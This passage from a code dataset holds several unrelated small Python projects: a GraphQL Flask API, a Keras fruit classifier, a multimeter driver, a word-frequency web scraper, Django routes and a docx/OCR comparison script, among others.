cuotasP=i[4]\r\n        cuotasL=i[5]\r\n        Plan=PlanAhorro(cod, mod, vers, val, cuotasP, cuotasL)\r\n        Lista.append(Plan)\r\n    archivo.close()\r\n","repo_name":"SantiagoFigueroa04/Ejercicios","sub_path":"Ejer 5/LeerArchivo.py","file_name":"LeerArchivo.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25257960118","text":"\"\"\"\nscript to create subscenarios for running individual countries in SAPP\n\"\"\"\n\nimport os\nimport pandas as pd\n\n# input csvs path\ninput_path = \"/Users/meas/Documents/gridpath-0.14.1/db/csvs_sapp_GPv0.14.1_workshop_072022\"\n\n# output csvs path\noutput_path = \"/Users/meas/Documents/gridpath-0.14.1/db/csvs_reds_102022\"\n\n# get project to load zone mapping\nproject_lz_file = os.path.join(input_path, \"project/project_load_zones/2_2.csv\") # subscenario 2 is used in base\nproject_lz_df = pd.read_csv(project_lz_file)\nun_lz = project_lz_df.load_zone.unique().tolist()\nun_lz = sorted(un_lz)\n\n# read in base portfolio file\nproject_portfolio_file = os.path.join(input_path, \"project/project_portfolios/100_project_portfolios_simple_re.csv\")\nproject_portfolio_df = pd.read_csv(project_portfolio_file)\n\n# loop through and create country-specific portfolios\nfor i in range(len(un_lz)):\n    lz = un_lz[i]\n    proj = project_lz_df[project_lz_df.load_zone == lz]\n    un_proj = proj.project.unique().tolist()\n    lz_portfolio = project_portfolio_df[project_portfolio_df.project.isin(un_proj)]\n\n    subs_id = 101+i\n    lz_portfolio.to_csv(os.path.join(output_path,\n                                     \"project/project_portfolios\",\n                                     str(subs_id) + \"_project_portfolios_simple_re_\" + lz + \".csv\"), index=False)\n\n# read in load zones file\nload_zones_file = os.path.join(input_path, \"system_load/load_zones/1_15zones.csv\")\nload_zones_df = pd.read_csv(load_zones_file)\n\n# loop through regions and create load zones files\nfor i in range(len(un_lz)):\n    lz = un_lz[i]\n    sub_lz = load_zones_df[load_zones_df.load_zone == lz]\n\n    subs_id = 101 + i\n    sub_lz.to_csv(os.path.join(output_path,\n                               \"system_load/load_zones\",\n                               str(subs_id) + \"_1zone_\" + lz + \".csv\"), 
index=False)\n","repo_name":"cetlab-ucsb/gridpath-technical-workshop","sub_path":"scripts/country-zones.py","file_name":"country-zones.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16516092268","text":"import pyJvsip as pjv\nL = 9\na=pjv.create('vview_f',L);\nb=a.empty\nab_bl=pjv.create('vview_bl',L);\na.ramp(-2.0,1)\nb.ramp(2.0,-1)\nprint('index A B\\n')\nfor i in range(L):\n print('%3i %7.1f %7.1f\\n'%(i,a[i],b[i]))\n_=pjv.leq(a,b,ab_bl)\nif ab_bl.anytrue:\n ab_vi=ab_bl.indexbool\n for i in range(ab_vi.length):\n print('A = B at index %3i\\n'%int(ab_vi[i]))\nelse:\n print('No true cases')\n","repo_name":"rrjudd/jvsip","sub_path":"python/pyJvsip_example/example15/example15.py","file_name":"example15.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"35"} +{"seq_id":"40377732014","text":"from Desc_Accesibilidad_BE import desc_AccesibilidadBE\nfrom DB_Desc_Accesibilidad_BE import Desc_AccesibilidadDB\n\ndef desc_accesibilidadAppAdmin():\n desc_accesibilidadbe=desc_AccesibilidadBE()\n desc_accesibilidaddb = Desc_AccesibilidadDB()\n print(\"Inicializando la app de Airbnb Residencia\")\n while True:\n Menu = \"\"\"\\nElija una de las siguientes opciones:\n 0-Salir de la app\n 1-Recuperar todos las descripciones\n 2-Ingresar una nueva descripción\n 3-Actualizar una descripción\n 4-Eliminar descripción\\n\"\"\"\n print(\"-\" * 100)\n print(Menu)\n print(\"-\" * 100)\n option = int(input(\"Opción: \"))\n\n if option == 0:\n print(\"\\nDeteniendo la aplicación de Airbnb Residencia\")\n # desc_accesibilidaddb.connection.close()\n break\n if option == 1:\n desc_accesibilidadbe.getAllDescription()\n if option == 2:\n desc_accesibilidadbe.addDescription()\n if option == 3:\n desc_accesibilidadbe.updateDescription()\n if option == 4:\n desc_accesibilidadbe.deleteDescription()\n\n# desc_accesibilidadAppAdmin()","repo_name":"DAP-web/AirbnbProyect","sub_path":"Segundo Avance/Formularios ABC/Desc_AccesibilidadApp_FE.py","file_name":"Desc_AccesibilidadApp_FE.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8065250259","text":"import os, random, math\nfrom pprint import pprint\nfrom datetime import datetime as dt\nimport numpy as np\nimport keras as k\n\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\n\nSEED = 1337\nnp.random.seed(SEED)\n\nVALID_FRUITS = [\"Apricot\",\"Avocado\",\"Banana\",\"Chestnut\",\"Clementine\",\"Granadilla\",\"Kiwi\",\"Limes\",\n \"Mango\",\"Maracuja\",\"Peach\",\"Pear\",\"Pomegranate\",\"Raspberry\",\"Pineapple\",\"Strawberry\",\"Walnut\"]\n\nIMG_WIDTH=35\nIMG_HEIGHT=35\nTARGET_SIZE=[IMG_WIDTH, IMG_HEIGHT]\n\nCHANNELS=3\n\nTRAIN_PATH = \"/home/veerapandian/projects/fruits-360/Training\"\nTEST_PATH = \"/home/veerapandian/projects/fruits-360/Test\"\nPREDICTION_PATH = \"/home/veerapandian/projects/fruits-360/test-multiple_fruits\"\n\nBATCH_SIZE=32\nEPOCHS=20\n\ntrain_gen = k.preprocessing.image.ImageDataGenerator(rotation_range=0.1,width_shift_range=0.1,\n height_shift_range=0.1,brightness_range=[0.5, 1.5],\n channel_shift_range=0.05,rescale=1./255)\n\ntest_gen = k.preprocessing.image.ImageDataGenerator(rotation_range=0.1,width_shift_range=0.1,\n height_shift_range=0.1,brightness_range=[0.5, 1.5],\n channel_shift_range=0.05,rescale=1./255)\n\ntrain_images_iter = 
train_gen.flow_from_directory(TRAIN_PATH,target_size = TARGET_SIZE,classes = VALID_FRUITS,\n class_mode = 'categorical',seed = SEED)\n\ntest_images_iter = test_gen.flow_from_directory(TEST_PATH,target_size = TARGET_SIZE,classes = VALID_FRUITS,\n class_mode = 'categorical',seed = SEED)\n\ndef get_subplot_grid(mylist, columns, figwidth, figheight):\n plot_rows = math.ceil(len(mylist) / 2.)\n fig, ax = plt.subplots(plot_rows, 2, sharey=True, sharex=False)\n fig.set_figwidth(figwidth)\n fig.set_figheight(figheight)\n fig.subplots_adjust(hspace=0.4)\n axflat = ax.flat\n #remove the unused subplot, if any\n for ax in axflat[ax.size - 1:len(mylist) - 1:-1]:\n ax.set_visible(False)\n return fig, axflat\n\ntest_images_classes = [\"Avocado\",\"Kiwi\",\"Pear\",\"Pineapple\",\"Pomegranate\",\"Strawberry\"]\ntest_images=[]\n\nplt.rc('font',family = 'sans-serif', size=8)\nfig, axflat = get_subplot_grid(mylist=test_images_classes, columns=2, figwidth=4, figheight=6)\n\nfor idx, label in enumerate(test_images_classes):\n image_folder = os.path.join(TRAIN_PATH, label)\n image_file = os.path.join(image_folder, random.choice(os.listdir(image_folder)) )\n loaded_image = k.preprocessing.image.load_img(path=image_file,target_size=(IMG_WIDTH,IMG_HEIGHT,CHANNELS))\n #convert to array and resample dividing by 255\n img_array = k.preprocessing.image.img_to_array(loaded_image) / 255.\n test_images.append({\"idx\":idx, \"image\":img_array, \"label\": label})\n axflat[idx].set_title(label, size=12)\n axflat[idx].imshow(img_array)\nplt.show()\nplt.gcf().clear()\n\ntrained_classes_labels = list(train_images_iter.class_indices.keys())\ntrain_images_iter.class_indices\n\nunique, counts = np.unique(train_images_iter.classes, return_counts=True)\nprint (\"number of samples per class\")\ndict(zip(train_images_iter.class_indices, counts))\n\ndef build_model():\n rtn = k.Sequential()\n rtn.add(k.layers.Conv2D(filters = 64, kernel_size = (3,3), padding = 'same', strides=(1, 1),\n input_shape = (IMG_WIDTH, IMG_HEIGHT, CHANNELS),\n kernel_regularizer=k.regularizers.l2(0.0005),\n name='conv2d_1'\n )\n )\n rtn.add(k.layers.BatchNormalization())\n rtn.add(k.layers.Activation('relu', name='activation_conv2d_1'))\n rtn.add(k.layers.SpatialDropout2D(0.2))\n rtn.add(k.layers.Conv2D(filters = 128, kernel_size = (3,3), padding = 'same', name='conv2d_2'))\n rtn.add(k.layers.BatchNormalization())\n rtn.add(k.layers.LeakyReLU(0.5, name='activation_conv2d_2'))\n rtn.add(k.layers.MaxPooling2D(pool_size = (2,2)))\n rtn.add(k.layers.Flatten())\n rtn.add(k.layers.Dense(units = 250, name='dense_1' ) )\n rtn.add(k.layers.Activation('relu', name='activation_dense_1'))\n rtn.add(k.layers.Dropout(0.5))\n rtn.add(k.layers.Dense(units = len(trained_classes_labels), name='dense_2'))\n rtn.add(k.layers.Activation('softmax', name='activation_final'))\n return rtn\n\nmy_model = build_model()\nmy_model.compile(loss = 'categorical_crossentropy',metrics = ['accuracy'],\n optimizer = k.optimizers.RMSprop(lr = 1e-4, decay = 1e-6))\n\nstart = dt.now()\nhistory = my_model.fit_generator(\n train_images_iter,\n steps_per_epoch = train_images_iter.n // BATCH_SIZE, #floor per batch size\n epochs = EPOCHS,\n validation_data = test_images_iter,\n validation_steps = test_images_iter.n // BATCH_SIZE,\n verbose = 1,\n callbacks = [\n #early stopping in case the loss stops decreasing\n k.callbacks.EarlyStopping(monitor='val_loss', patience=3),\n # only save the model if the monitored quantity (val_loss or val_acc) has improved\n 
k.callbacks.ModelCheckpoint(\"fruits_checkpoints.h5\", monitor='val_loss', save_best_only = True),\n # only needed for visualising with TensorBoard\n k.callbacks.TensorBoard(log_dir = \"logs/{:%d_%b_%Y_%H:%M:%S}\".format(dt.now()) )\n ]\n)\nprint(history.history.keys())\n\nplt.style.use('fivethirtyeight')\n\nxepochs = [i+1 for i in range(0, len(history.history['loss']))]\nplt.figure(figsize=(5,3))\n# Loss\n#plt.ylim([-0.1,0.5])\nplt.plot(xepochs, history.history['loss'])\nplt.plot(xepochs, history.history['val_loss'])\nplt.xticks(xepochs)\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['training', 'validation'], loc='upper left')\nplt.show()\n\n# Accuracy\n#plt.ylim([0.7,1.05])\n# plt.figure(figsize=(5,3))\n# plt.plot(xepochs, history.history['acc'])\n# plt.plot(xepochs, history.history['val_acc'])\n# plt.xticks(xepochs)\n# plt.title('model accuracy')\n# plt.ylabel('accuracy')\n# plt.xlabel('epoch')\n# plt.legend(['training', 'validation'], loc='upper left')\n# plt.show()\n\ndf_out = {'val_loss': history.history['val_loss'][0],'val_acc': history.history['val_accuracy'][0],\n 'elapsed_time': (dt.now() - start).seconds}\nprint(df_out)\n\nmy_model=build_model()\nmy_model.load_weights(\"fruits_checkpoints.h5\")\nmy_model.compile(loss = 'categorical_crossentropy', \n metrics = ['accuracy'], \n optimizer = k.optimizers.RMSprop(lr = 1e-4, decay = 1e-6)\n )\nprint(\"Created model and loaded weights from file\")\n\nmy_model.summary()\n\nPREDICTION_PATH = \"/home/veerapandian/projects/fruits-360/sample\"\nimages_for_prediction = [filename for filename in sorted(os.listdir(PREDICTION_PATH)) if filename.endswith(\".jpg\")]\n\nfor filename in images_for_prediction:\n loaded_image = k.preprocessing.image.load_img(path=PREDICTION_PATH+'/'+filename, target_size=(IMG_WIDTH,IMG_HEIGHT,CHANNELS))\n #convert to array and resample dividing by 255\n img_array = k.preprocessing.image.img_to_array(loaded_image) / 255.\n\n #add sample dimension. 
the predictor is expecting (1, CHANNELS, IMG_WIDTH, IMG_HEIGHT)\n img_np_array = np.expand_dims(img_array, axis = 0)\n #img_class = my_model.predict_classes(img_np_array)\n\n predictions = my_model.predict(img_np_array)\n classidx = np.argmax(predictions[0])\n label = trained_classes_labels[classidx]\n\n predictions_pct = [\"{:.2f}%\".format(prob * 100) for prob in predictions[0] ]\n pprint(dict(zip(trained_classes_labels, predictions_pct)) )\n print(\"Prediction: %s (class %s) %s\" % (label, classidx, predictions_pct[classidx])) \n\n plt.figure(figsize=(3,4))\n plt.imshow(img_array)\n plt.title(\"%s %s\" % (label, predictions_pct[classidx]))\n plt.show()\n\nplt.gcf().clear()\n","repo_name":"veerapandian22/Deep-Learning","sub_path":"cnn_keras.py","file_name":"cnn_keras.py","file_ext":"py","file_size_in_byte":7831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4088749689","text":"import os\nfrom ariadne import QueryType, MutationType,graphql_sync, make_executable_schema\nfrom ariadne.constants import PLAYGROUND_HTML\nfrom flask import Flask, request, jsonify\n\nfrom models import db, ma\nfrom models.author import Author\nfrom models.book import Book\nfrom models.authorSchema import AuthorSchema\nfrom models.bookSchema import BookSchema\nfrom schemas.type_defs import type_defs, datetime_scalar\n\n\nauthor_schema = AuthorSchema()\nauthors_schema = AuthorSchema(many=True)\n\nbook_schema = BookSchema()\nbooks_schema = BookSchema(many=True)\n\nquery = QueryType()\nmutation = MutationType()\n\n\n@query.field(\"authors\")\ndef resolve_authors(_, info):\n data = Author.query.all()\n return authors_schema.dump(data)\n\n@query.field(\"author\")\ndef resolve_author(_, info, id):\n data = Author.query.get(id)\n return author_schema.dump(data)\n\n@query.field(\"books\")\ndef resolve_books(_, info):\n data = Book.query.all()\n return books_schema.dump(data)\n\n@query.field(\"book\")\ndef resolve_book(_, info, id):\n data = Book.query.get(id)\n return book_schema.dump(data)\n\n@mutation.field(\"addAuthor\")\ndef resolve_add_author(_, info, name, lastname):\n author = Author(name=name, lastname=lastname)\n db.session.add(author)\n db.session.commit()\n return author_schema.dump(author)\n\n@mutation.field(\"addBook\")\ndef resolve_add_book(_, info, title, author_id):\n author = Author.query.get(author_id)\n book = Book(title=title, author=author)\n db.session.add(book)\n db.session.commit()\n return book_schema.dump(book)\n\n@mutation.field(\"updateAuthor\")\ndef resolve_update_author(_, info, id, name, lastname):\n author = Author.query.get(id)\n author.name = name\n author.lastname = lastname\n db.session.commit()\n return author_schema.dump(author)\n\n@mutation.field(\"updateBook\")\ndef resolve_update_book(_, info, id, title):\n book = Book.query.get(id)\n book.title = title\n db.session.commit()\n return book_schema.dump(book)\n\n@mutation.field(\"deleteAuthor\")\ndef resolve_delete_author(_, info, id):\n author = Author.query.get(id)\n db.session.delete(author)\n db.session.commit()\n return author_schema.dump(author)\n\n@mutation.field(\"deleteBook\")\ndef resolve_delete_book(_, info, id):\n book = Book.query.get(id)\n book.author = None\n db.session.delete(book)\n db.session.commit()\n return book_schema.dump(book)\n\nschema = make_executable_schema(type_defs, [query, mutation, datetime_scalar])\n\napp = Flask(__name__)\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"mysql+pymysql://{}@{}:{}/{}\".format(os.environ.get(\"USER\"), 
os.environ.get(\"HOST\"), os.environ.get(\"PORT\"), os.environ.get(\"DATABASE\"))\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb.init_app(app)\nma.init_app(app)\n\nwith app.app_context():\n db.create_all()\n\n\n@app.route(\"/graphql\", methods=[\"GET\"])\ndef graphql_playground():\n return PLAYGROUND_HTML, 200\n\n\n@app.route(\"/graphql\", methods=[\"POST\"])\ndef graphql_server():\n data = request.get_json()\n\n success, result = graphql_sync(\n schema,\n data,\n context_value=request,\n debug=app.debug\n )\n\n status_code = 200 if success else 400\n return jsonify(result), status_code\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"AlegreCode/tutorial-flask-ariadne","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72948552742","text":"import os\nfrom setuptools import setup\n\nTEST_DEPENDENCIES = [\n \"black==20.8b1\",\n \"flake8==3.9.0\",\n \"pytest==6.2.3\",\n \"pytest-cov==2.11.1\",\n]\n\nwith open(os.path.join(os.path.abspath(os.path.dirname(__file__)), \"README.md\"), encoding=\"utf-8\") as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name=\"pytoschema\",\n description=\"A package to convert Python type annotations into JSON schemas\",\n long_description=LONG_DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n version=\"2.0.0\",\n author=\"Carlos Ruiz Lantero\",\n author_email=\"carlos.ruiz.lantero@comprehensivetech.co.uk\",\n maintainer=\"Carlos Ruiz Lantero\",\n maintainer_email=\"carlos.ruiz.lantero@comprehensivetech.co.uk\",\n url=\"https://github.com/comprehensivetech/pytoschema\",\n packages=[\"pytoschema\"],\n classifiers=[\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n tests_require=TEST_DEPENDENCIES,\n extras_require={\"test\": TEST_DEPENDENCIES},\n)\n","repo_name":"Lantero/pytoschema","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20505916410","text":"#\n# LSST / LPNHE\n# Author: Laurent Le Guillou\n#\n\"\"\"\nTestbench driver for the Keithley multimeter \n(through keithley-server and XML-RPC).\n\"\"\"\n\n# XML-RPC interface:\n#\n# # General Control Functions \n# server.register_function(keithley.status, \"status\")\n# server.register_function(keithley.open, \"open\")\n# server.register_function(keithley.close, \"close\")\n# server.register_function(keithley.reset, \"reset\")\n# server.register_function(keithley.clear, \"clear\")\n# server.register_function(keithley.get_serial, \"get_serial\")\n# server.register_function(keithley.get_serial, \"checkConnection\")\n\n# # Keithley generic command\n# server.register_function(keithley.send, \"send\")\n# server.register_function(keithley.get_error_status, \"get_error_status\")\n\n# # misc \n# server.register_function(keithley.scroll_text, \"scroll_text\")\n# server.register_function(server_quit, \"quit\")\n\n# # for remote introspection (tab completion with ipython)\n# server.register_function(keithley._listMethods, \"__dir__\")\n# server.register_function(keithley._listMethods, \"system.listMethods\")\n# server.register_function(keithley._listMethods, \"trait_names\")\n# server.register_function(keithley._listMethods, \"_getAttributeNames\")\n# # TODO: implement: 
system.methodSignature\n# server.register_function(keithley._methodHelp, \"system.methodHelp\")\n\nfrom driver import Driver\n\nimport xmlrpclib\nimport logging\n\n# =======================================================================\n\nclass Instrument(Driver):\n\n    # ===================================================================\n    # Generic methods (init, open, etc)\n    # ===================================================================\n\n    def __init__(self, identifier, **kargs):\n        Driver.__init__(self, identifier, **kargs)\n        \n        # self.identifier = identifier\n        # self.host = host\n        # self.device = device\n        # self.port = port # XML-RPC port\n\n        if 'host' not in kargs.keys():\n            raise ValueError(\"host is requested\")\n\n        if 'devices' not in kargs.keys():\n            raise ValueError(\"devices is requested\")\n\n        if 'port' not in kargs.keys():\n            raise ValueError(\"port is requested\")\n\n        self.xmlrpc = xmlrpclib.ServerProxy(\"http://%s:%d/\" % \n                                            (self.host, self.port))\n\n        self.lastmeasure = 0.0 # None should be better ?\n\n\n    def open(self):\n        \"\"\"\n        Open the hardware connection.\n        \"\"\"\n        self.xmlrpc.open()\n\n\n    def is_connected(self):\n        \"\"\"\n        Check if the connection is established with the hardware.\n        Returns True if the hardware answers, False otherwise.\n        \"\"\"\n        answer = self.checkConnection()\n\n        if answer == \"\":\n            return False\n\n        if 'KEITHLEY' not in answer:\n            return False\n        \n        return True\n\n\n    def checkConnection(self):\n        \"\"\"\n        Returns a NULL string or the instrument model name\n        \"\"\"\n        return self.xmlrpc.checkConnection()\n\n\n    def register(self, bench):\n        self.open()\n        connected = self.is_connected()\n        if not(connected):\n            raise IOError(\"Keithley Multimeter not connected.\")\n\n        Driver.register(self, bench)\n\n\n    def close(self):\n        \"\"\"\n        Close the hardware connection.\n        \"\"\"\n        self.xmlrpc.close()\n        # TODO: Check errors\n\n\n    # ===================================================================\n    # Instrument specific methods\n    # ===================================================================\n\n\n    def status(self):\n        \"\"\"\n        Return the status of the system.\n        \"\"\"\n        return self.xmlrpc.status()\n\n    # --------------------------------------------------------------\n\n    def reset(self):\n        \"\"\"\n        Reset the instrument to the factory default settings\n        (with the exception of all remote interface settings).\n        \"\"\"\n        logging.info(\"Keithley.reset() called.\")\n        result = self.xmlrpc.reset()\n        logging.info(\"Keithley.reset() done.\")\n        return result\n\n\n    def clear(self):\n        \"\"\"\n        Clear the instrument status.\n        \"\"\" \n        logging.info(\"Keithley.clear() called.\")\n        result = self.xmlrpc.clear()\n        logging.info(\"Keithley.clear() done.\")\n        return result\n\n    \n    # ----------------------- Keithley generic command ------------------\n\n    def send(self, command, timeout = 1.0):\n        \"\"\"\n        Send a command through the serial port.\n        Read the answer from the serial port.\n        Return it as a string.\n\n        If <timeout> is specified, the function will wait\n        for data with the specified timeout (instead of the default one). 
\n \"\"\"\n\n logging.info(\"Keithley.send() called.\")\n logging.info(\" command = [%s]\" % command)\n answer = self.xmlrpc.send(command, timeout)\n logging.info(\" answer = [%s]\" % answer)\n logging.info(\"Keithley.send() done.\")\n esr = self.xmlrpc.get_error_status()\n if esr != 0:\n logging.error(\"Keithley command [%s] failed: error code ESR = %d.\" \n % (command, esr))\n raise IOError(\"Keithley command [%s] failed: error code ESR = %d.\" \n % (command, esr))\n return answer\n\n # ----------------------- Keithley identification -------------------\n\n def get_serial(self):\n \"\"\"\n Return the identification string of the Keithley.\n \"\"\"\n logging.info(\"Keithley.get_serial() called.\")\n serial = self.xmlrpc.get_serial()\n logging.info(\" serial = [%s]\" % serial)\n logging.info(\"Keithley.get_serial() done.\")\n return serial\n\n # ----------------------- Various methods ---------------------------\n\n def scroll_text(self, msg):\n \"\"\"\n Scroll text 'msg' on the Multimeter display.\n For debug purpose only.\n \"\"\"\n logging.info(\"Keithley.scroll_text() called.\")\n result = self.xmlrpc.scroll_text(msg)\n logging.info(\"Keithley.scroll_text() done.\")\n return result\n\n\n # ----------------------- Higher level methods ----------------------\n\n def setup_current_measurements(self, current_range):\n \"\"\"\n Reset the Keithley and set it up for current measurements,\n using the specified current range (float).\n Useful when using photodiodes (DKD, NIST, etc).\n \"\"\"\n logging.info(\"Keithley.setup_current_measurements() called.\")\n self.send(\"*RST\")\n self.send(\"SYST:ZCH ON\")\n self.send(\"FUNC 'CURR:DC'\")\n self.send(\"CURR:RANG %.2g\" % current_range)\n self.send(\"SYST:ZCOR ON\")\n self.send(\"SYST:ZCH OFF\")\n logging.info(\"Keithley.setup_current_measurements() done.\")\n\n\n def read_measurement(self):\n \"\"\"\n Proceed to an individual measurement (READ?) and parse\n the resulting output (trying to take into account the\n various Keithley idiosyncracies).\n \"\"\"\n logging.info(\"Keithley.read_measurements() called.\")\n s = self.send(\"READ?\")\n elts = s.split(\",\")\n if len(elts) < 2: # has at minimum 2 fields, sometimes three...\n logging.error(\"READ?: no/incomplete data from the Keithley.\")\n raise IOError(\"READ?: no/incomplete data from the Keithley.\")\n\n measure = float(elts[0].replace('A', '')) # sometime the unit is there\n logging.info(\" measure = %g\" % measure)\n logging.info(\"Keithley.read_measurements() done.\")\n\n # keep memory of the last measure\n self.lastmeasure = measure\n \n return measure\n\n # ===================================================================\n # PRE/POST exposure hooks\n # ===================================================================\n\n def pre_exposure(self, exptime):\n pass\n\n def post_exposure(self):\n self.read_measurement()\n\n # ===================================================================\n # Meta data / state of the instrument \n # ===================================================================\n\n\n def get_meta(self):\n \"\"\"\n Returns meta data describing the current state\n of the instrument. 
\n Useful to fill the FITS headers.\n \"\"\"\n\n # keys : specify the key order\n keys = ['MODEL',\n 'DRIVER',\n 'CURRENT']\n\n # comments : meaning of the keys\n comments = {\n 'MODEL' : 'Instrument model',\n 'DRIVER' : 'Instrument software driver',\n 'CURRENT': '[A] Current measurement in photodiode' \n }\n\n values = {\n 'MODEL' : self.get_serial()[:36],\n 'DRIVER' : 'keithley-server / keithley_ks', \n 'CURRENT': self.lastmeasure\n }\n\n data = []\n \n return keys, values, comments, data\n\n # ===================================================================\n","repo_name":"lsst-camera-dh/pybench-ccd-reb","sub_path":"testbench/drivers/keithley_ks.py","file_name":"keithley_ks.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5995270934","text":"#!/usr/bin/env python3\n\nimport ResolveLib.ianresolvelib as r\nimport argparse\n\n\"\"\" \nOpen the most recent version of a project.\n\nPass in the \"top level\" folder name, and it assumes that there are loads of \nfiles there named \"Project 01\" \"Project 02\" et cetera. Manual versioning.\n\nThis script lists them in alphabetical order and then opens the last \none in the list. So … hopefully it works for you? No guarantees.\n\"\"\"\n\nparser = argparse.ArgumentParser(description=\"Open the last (hopefully most recent) version of a file in a folder. In DaVinci Resolve, in case that wasn't clear.\")\nparser.add_argument(\"folder_name\", help=\"The name of the top level folder to look in.\")\nargs = parser.parse_args()\n\ntopLevelFolderName = args.folder_name\n\nr.bringToFront()\n\nr.projectManager.GotoRootFolder()\nr.projectManager.OpenFolder(topLevelFolderName)\n\n# gotta get the values from the dict, and convert to a list. 
Ugh\nprojects = list(r.projectManager.GetProjectsInCurrentFolder().values())\n\n# finally, sort it and grab the last one\nlast = sorted(projects)[-1]\n\nr.projectManager.LoadProject(last)\n","repo_name":"systemik/ians-davinci-resolve-scripts","sub_path":"openLastFileInFolder.py","file_name":"openLastFileInFolder.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"10369767881","text":"import requests\nimport random\nfrom collections import Counter\n\ndef get_raw_text(url='test'):\n proxies = ['http://159.203.3.234', 'http://164.132.170.100', 'http://146.59.2.185', 'http://137.74.65.101', ] \n proxy = {'http': random.choice(proxies)} \n headers_list = [{ \n 'authority': 'httpbin.org', \n 'cache-control': 'max-age=0', \n 'sec-ch-ua': '\"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"', \n 'sec-ch-ua-mobile': '?0', \n 'upgrade-insecure-requests': '1', \n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36', \n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', \n 'sec-fetch-site': 'none', \n 'sec-fetch-mode': 'navigate', \n 'sec-fetch-user': '?1', \n 'sec-fetch-dest': 'document', \n 'accept-language': 'en-US,en;q=0.9', \n }] \n headers = random.choice(headers_list) \n return requests.get(url, headers=headers, proxies=proxy).text\n\ndef get_wordcount(text=\"SHOULD BE 3\"):\n split_text = text.split()\n bl = [';', '-', '.', '_', '<', '>', '=', '%', '@', '{', '}', '[', ']', '(', ')', '\\\\', '/', '|', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',]\n for c in bl:\n split_text = [ x for x in split_text if c not in x ]\n print(split_text)\n return len(split_text) * 0.95\n\ndef get_common_words(text='TESTING THIS SCRIPT'):\n split_text = text.lower().split()\n bl = ['<', '>', '=', '%', '@', '}', '{', '[', ']', '|', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'in', 'and', 'with', 'can', 'be', 'made', 'you', 'of', 'the', 'from', 'for']\n for c in bl:\n split_text = [ x for x in split_text if c not in x ]\n split_text = [x for x in split_text if len(x) >= 3]\n \n found = Counter(split_text)\n return found.most_common(5)\n\ndef get_percent_words(text=' '):\n wordcount = get_wordcount(text=text)\n common_words = get_common_words(text=text)\n words_percent = {}\n\n for word in range(len(common_words)):\n words_percent[common_words[word][0]] = (float(common_words[word][1]) / wordcount) * 100\n\n return words_percent\n","repo_name":"AmmarKhawaja/websiteAI","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6707297909","text":"\nfrom django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n #Render Paths****************************\n path('', views.home),\n path('wall', views.wall),\n #Redirect Paths****************************\n path('register/new-user', views.register),\n path('login/user', views.login),\n path('message/posted', views.new_message),\n path('comment/posted', views.new_comment),\n path('message//delete', views.delete_message),\n path('wall/logout', views.logout),\n]","repo_name":"ChrisJHatfield/Python","sub_path":"Django/the_wall/wall_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14768442398","text":"from docx import Document\nfrom docx.document import Document as _Document\nfrom docx.oxml.text.paragraph import CT_P\nfrom docx.oxml.table import CT_Tbl\nfrom docx.table import _Cell, Table\nfrom docx.text.paragraph import Paragraph\nfrom docx.shared import RGBColor\n\nimport tools\nimport difflib\nimport docx_to_txt\nimport inspect\n\ndocx_path = tools.get_path('../../material/2-电子版对照.docx')\ndocx_txt_path = tools.get_path('../../output/2-电子版对照.txt')\nocr_path = tools.get_path('../../material/2-打印出纸质版.ocr.txt')\nresult_path = tools.get_path('../../output/2-对照.docx')\n\nocr_content = ''\nwith open(ocr_path, 'r') as file:\n ocr_content = file.read()\n\ndocx_to_txt.word_to_txt(docx_path, docx_txt_path)\n\ndocx_content = ''\nwith open(docx_txt_path, 'r') as file:\n docx_content = file.read()\n\ndiffer = difflib.Differ()\ndiff_content = differ.compare(docx_content, ocr_content)\ndiff = list(diff_content)\n\n\ndef add_run(paragraph, run, item):\n new_run = paragraph.add_run(item[-1])\n new_run.style = run.style\n font_members = inspect.getmembers(run.font)\n for member in font_members:\n member_name = member[0]\n if (not 